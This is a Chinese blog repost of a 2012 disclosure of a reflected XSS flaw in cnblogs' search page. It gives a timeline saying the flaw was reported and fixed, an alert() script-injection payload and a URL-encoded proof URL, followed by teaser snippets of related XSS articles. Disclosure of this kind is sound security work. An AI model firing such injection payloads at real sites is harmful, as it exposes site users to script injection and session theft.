博客园找找看XSS漏洞

最新推荐文章于 2023-04-12 21:27:48 发布
最新推荐文章于 2023-04-12 21:27:48 发布
阅读量103 收藏
点赞数
原文链接:http://www.cnblogs.com/invade/archive/2012/02/02/2336107.html
版权
2012年02月01日 18:47 (星期三): 漏洞已通知官方!
2012年02月01日 22:51 (星期三): 厂商e-mail回复确认,等待厂商修复!
2012年02月02日 11:50 (星期四): 厂商e-mail回复已经修复!
2012年02月02日 17:54 (星期四): 漏洞向公众公开!

 

简要描述

博客园找找看XSS漏洞

 

详细说明

"><script>alert(/XSS/)</script>

 

漏洞证明

http://zzk.cnblogs.com/s?w=hacker&t=%22%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%2F%58%53%53%2F%29%3C%2F%73%63%72%69%70%74%3E

 

图片证明

 

官方确认

 

修复回应

转载于:https://www.cnblogs.com/invade/archive/2012/02/02/2336107.html

weixin_30408165
关注
php v9最新漏洞,Phpcms v9漏洞分析
weixin_30222083的博客
03-10 2536
*本文中涉及到的相关漏洞已报送厂商并得到修复,本文仅限技术研究与讨论,严禁用于非法用途,否则产生的一切后果自行承担。最近研究源码审计相关知识,会抓起以前开源的CMS漏洞进行研究,昨天偶然看见了这个PHPCMS的漏洞,就准备分析研究一番,最开始本来想直接从源头对代码进行静态分析,但是发现本身对PHPCMS架构不是很熟悉,导致很难定位代码的位置,最后就采用动态调试&静态分析的方式对漏洞的触发进...
【干货】XSS知识总结
hackzkaq的博客
10-27 6705
XSS基础 跨站脚本(英语:Cross-site scripting,通常简称为:XSS)是一种网站应用程序的安全漏洞攻击,是代码注入的一种。它允许恶意用户将代码注入到网页上,其他用户在观看网页时就会受到影响。这类攻击通常包含了HTML以及用户端脚本语言。 XSS攻击通常指的是通过利用网页开发时留下的漏洞,通过巧妙的方法注入恶意指令代码到网页,使用户加载并执行攻击者恶意制造的网页程序。这些恶意网页程序通常是JavaScript,但实际上也可以包括Java,VBScript,ActiveX,Flash或者甚至
XSS跨站漏洞修复方案 彻底防止CSRF攻击
网站安全专家
09-06 1462
XSS跨站以及CSRF攻击,在目前的渗透测试,以及网站漏洞检测中 ,经常的被爆出有高危漏洞,我们SINE安全公司在对客户网站进行渗透测试时,也常有的发现客户网站以及APP存在以上的漏洞,其实CSRF以及XSS跨站很容易被发现以及利用,在收集客户网站域名,以及其他信息的时候,大体的注意一些请求操作,前端输入,get,post请求中,可否插入csrf代码,以及XSS代码。 很多客户的网站都有做一...
XSS漏洞
weixin_33877092的博客
03-18 109
跨站脚本漏洞Cross-site scripting可以对请求的数据做检测,如果请求数据中有<等就认为是恶意请求,禁止提交。aspx默认就是采用这种策略,这样做的缺点是如果做的是一个程序员论坛,程序员就无法发表HTML代码的帖子了,因此更好的处理策略是将用户发表的内容按照原样显示出来,而不是以HTML的方式显示出来。使用HttpUtility.HtmlEncode就可以将字符串中的<、...
XSS跨站攻击
Java
06-22 387
XSS跨站攻击 目录 1 XSS跨站攻击简介 1 1.1 什么是XSS 1 1.2 XSS的分类 1 1.3 XSS的危害 1 2 XSS的攻击原理 1 2.1 本地式漏洞攻击 1 2.2 存储式漏洞攻击 2 2.3 反射式漏洞攻击 2 3 XSS的防御策略 3 3.1 过滤特殊字符或敏感字段 3 3.2 对敏感数据进行加密 4 1 XSS跨站攻...
[XSS] 51CTO博客IE6跨站漏洞解析
weixin_33913377的博客
07-23 85
在编辑旧的博文时,发现新版编辑器插入特定HTML代码不能正确显示。比如“&lt;script type="text/javascript" src="test.js"&gt;&lt;/script&gt;”或者“&lt;link rel="stylesheet" type="text/css" href="test.css"&gt;”。发布后它们的最终页面显示效
XSS跨站漏洞
Agonie_25的博客
09-06 393
漏洞描述 攻击者可以通过构造URL注入JavaScript、VBScript、ActiveX、HTML或者Flash的手段,利用跨站脚本漏洞欺骗用户,收集Cookie等相关数据并冒充其他用户。通过精心构造的恶意代码,可以让访问者访问非法网站或下载恶意木马,如果再结合其他攻击手段(如社会工程学、提权等),甚至可以获取系统的管理权限。 解决方法 对用户输入的数据进行全面安全检查或过滤,尤其注意检...
XSS lab 1~14
m0_74047291的博客
11-10 264
xss初学者的作业
WEB漏洞-逻辑越权
weixin_46544151的博客
04-30 1493
目录 33、逻辑越权之水平垂直越权 原理 一、Pikachu-本地水平垂直越权演示(漏洞成因) 1.水平越权 2.垂直越权 3.越权漏洞产生的原理解析: 二、墨者水平-身份认证失效漏洞实战(漏洞成因) 三、越权检测-小米范越权漏洞检测工具(工具使用) 四、越权检测-Burpsuite插件Authz安装测试(插件使用) 1.在burpsuite中插件管理找到Authz安装 2.登录mozhe靶场test用户抓包,抓取card_id 3.pikachu中测试 34、逻辑越权之支付...
DVWA通关攻略(适合新手)
最新发布
夜思红尘的博客
04-12 9294
这里是关于网络安全入门的靶场DVWA,适合新手
【项目】 Java 过滤器 解决存储型xss攻击问题
冯浩月
12-22 3662
攻击者可以通过构造URL注入JavaScript、VBScript、ActiveX、HTML或者Flash的手段,利用跨站脚本漏洞欺骗用户,收集Cookie等相关数据并冒充其他用户。通过精心构造的恶意代码,可以让访问者访问非法网站或下载恶意木马,如果再结合其他攻击手段(如社会工程学、提权等),甚至可以获取系统的管理权限
XSS跨站脚本实例
weixin_33742618的博客
11-12 133
刚毕业时候的做的报告,整理文档的时候搜了出来,可能不是很正确仅供参考了 URL注入 例如在页面上输入 http://localhost/SNDA.BBSEngine.UI.ALWeb/TopicContent.aspx?BoardID=59&TopicID=6890&Page=1-->'");></SCRIPT><...
网络安全:XSS漏洞
垃圾管理员的垃圾站
09-05 644
前面的几篇文写得有点快了,有些地方囫囵吞枣的划过去。等停下来一段时间,我会慢慢去修改和补充。 现在放慢脚步来一点点的写。 XSS(Cross Site Scripting),又称跨站脚本攻击。看英文,缩写应该是CSS,但是为了区别前端的CSS(Cascading Style Sheets)层叠样式表,改名为XSS。这也算是“晚辈”对“长辈”的尊敬吧,何况你还属于“暗”,人家在...
网络攻击技术(二)——Cross-site scripting
stilling2006的专栏
01-21 6525
http://www.oschina.net/question/565065_57506 1.1.1 摘要 在本系列的第一篇博文中,我向大家介绍了SQL Injection常用的攻击和防范的技术。这个漏洞可以导致一些非常严重的后果,但幸运的是我们可以通过限制用户数据库的权限、使用参数化的SQL语句或使用ORM等技术来防范SQL Injection的发生,接来了要向大家介绍Cross-s
关于工行的XSS漏洞
Emu的专栏 —— 关注前端技术,关注网络优化
12-31 3744
原文发表在  http://www.blogjava.net/emu/archive/2006/12/31/91171.html这两天很流行玩这个:http://www.icbc.com.cn/news/hotspot.jsp?column=%3Cfont%20size=10%3E%BD%F7%B4%CB%D4%AA%B5%A9%BC%D1%BD%DA%D6%AE%BC%CA%A3%AC%B9
过滤器防止XSS攻击
qq_34567533的博客
10-22 1020
xss是钓鱼网站常用的方式,具体就是在提交的表单中加入脚本,数据在回显时浏览器执行了脚本, 具体的脚本可以是获取cookie,或者跳转至钓鱼网站; 解决方法,通过过滤器,将&lt;&gt;转义 新建filter实现类; package com.group.local.filter; import javax.servlet.*; import javax.servlet.http.Ht...
OWASP TOP 10
杨航的专栏
04-26 680
漏洞描述 风险描述 漏洞等级 修改建议 SQL注入: 没有对参数进行SQL过滤,且操作数据语句是拼接方式进行。 攻击者可以通过构造特殊URL的手段,利用SQL注入漏洞从数据库中获取敏感数据、修改数据库数据(插入/更新/删除) 、执行数据库管理操作(如关闭数据库管理系统),从而能导致数据丢失或数据破坏、缺乏可审计性或是拒绝服务。注入漏洞有时
腾讯QQ《应用管理器》存在XSS漏洞
孟冬毅!有一很大的舞台,那是世界!
05-26 1120
当然,写这篇文章的同时,我也把这个漏洞提交到了WooYun,要不了几天这个漏洞估计就不存在了! 没什么技术含量,就是平时看到搜索框就喜欢加点XSS搜索去试试 XSS有图 内容转载 http://www.mengdongyi.com/archives/203
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值